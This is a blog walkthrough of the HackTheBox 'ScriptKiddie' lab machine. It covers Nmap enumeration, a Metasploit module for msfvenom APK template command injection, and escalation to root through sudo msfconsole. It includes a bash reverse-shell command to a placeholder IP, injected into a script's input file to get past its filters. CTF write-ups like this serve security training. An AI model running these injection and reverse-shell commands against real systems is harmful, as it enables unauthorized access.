HackTheBox: (“ScriptKiddie”) — Walkthrough

Mohamed Elmasry
4 min readJun 5, 2021

--

Hi People :D

Today we gonna solve the “ScriptKiddie” machine from HackTheBox, let’s go :D

Info

TL;DR
— — —

  1. Ports 5000 and 22 are opened.
  2. Navigate to the website on port 5000, it contains three functions one of them is payloads creation with msfvenom.
  3. We can upload template file in payloads creation function, I found a Metasploit module which exploits a command injection vulnerability in this function.
  4. Using this module, I created the exploit APK then upload it which gave me a kid user shell and I found the user flag in the kid user directory.
  5. In the /home/pwn directory, there’s a bash script called scanlosers.sh which contains some code to read another file called hackers and do some filters that we need to bypass to get a shell as a pwn user
  6. After reading the script, I knew the right bypass that I used to execute a bash reverse shell in the hackers file and I successfully got a pwn user shell
  7. From the pwn user shell, we can run msfconsole as root without password, we can use msfconsole to read the root flag from /root/root.txt file

Enumeration

— — — — — —

Start with Nmap

nmap -A 10.10.10.226

We have two open ports (22/5000) so let’s navigate to the website on port 5000

Web Enumeration

— — — — — — — —

We have a website with some functions ( port scan with Nmap & make payloads with msfvenom & searchsploit ) on port 5000

I tried to brute-force directories and I also tried to trigger command injection in the Nmap function and the searchsploit function but without success ☹.

The remaining function is the payloads creation function with msfvenom, the interesting thing about this function is that we can upload a template file.

At the time, I didn’t know what template file was so I searched for any available exploit, fortunately, there’s a Metasploit module to trigger RCE in this function

Exploitation

— — — — — —

Let’s try this module, first, we use the module then set LHOST to your HTB VPN IP (tun0) and execute exploit command to make the exploit APK, here is the commands:

use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injectionset LHOST tun0set LPORT 4444exploit

We successfully made an exploit APK to get a shell, now we only need to start a Netcat listener then upload our crafted APK.

User Flag

— — — — —

Choose android os and put any lhost (like: 10.10.10.10) then choose your APK file (msf.apk by default) and click on generate button, you’ll get a shell as kid user and you will find the user flag in /home/kid/user.txt file ☺.

Root Flag

— — — — —

We can’t execute sudo -l command so let’s do some file enumeration.

Move to /home/pwn directory, there’s a bash script called scanlosers.sh.

This script reads another file called hackers then does cut command with -d argument that takes a delimiter and -f argument that takes a field number then does do-while loop with Nmap command and redirect the output to /dev/null to clear it.

So we need to bypass these filters, first, we need to bypass the cut command by add two spaces followed by a semicolon then put our reverse shell command followed by # to prevent redirection to /dev/null.

The final command will be like that:

  ;/bin/bash -c 'bash -i >& /dev/tcp/{Your_IP}/4444 0>&1' #

Start a Netcat listener and put this command in the hackers file with the echo command:

echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/{Your_IP}/4444 0>&1' #" >> hackers

And we successfully get a pwn user shell ☺.

Now try sudo -l command again with pwn user, we can run msfconsole as root without password

We can use msfconsole as a normal bash shell, this means that we can read the root flag from /root/root.txt by using normal cat command in msfconsole because we are running msfconsole as root and we have access to the root directory

Thanks for reading and I hope you love this writeup ❤.

You can give me a Respect on my HackTheBox Account (if you want :D).

Facebook TwitterLinkedIn

--

--

Mohamed Elmasry

Digital Forensics Investigator | CTF player and creator | SOC Analysts | Threat Hunter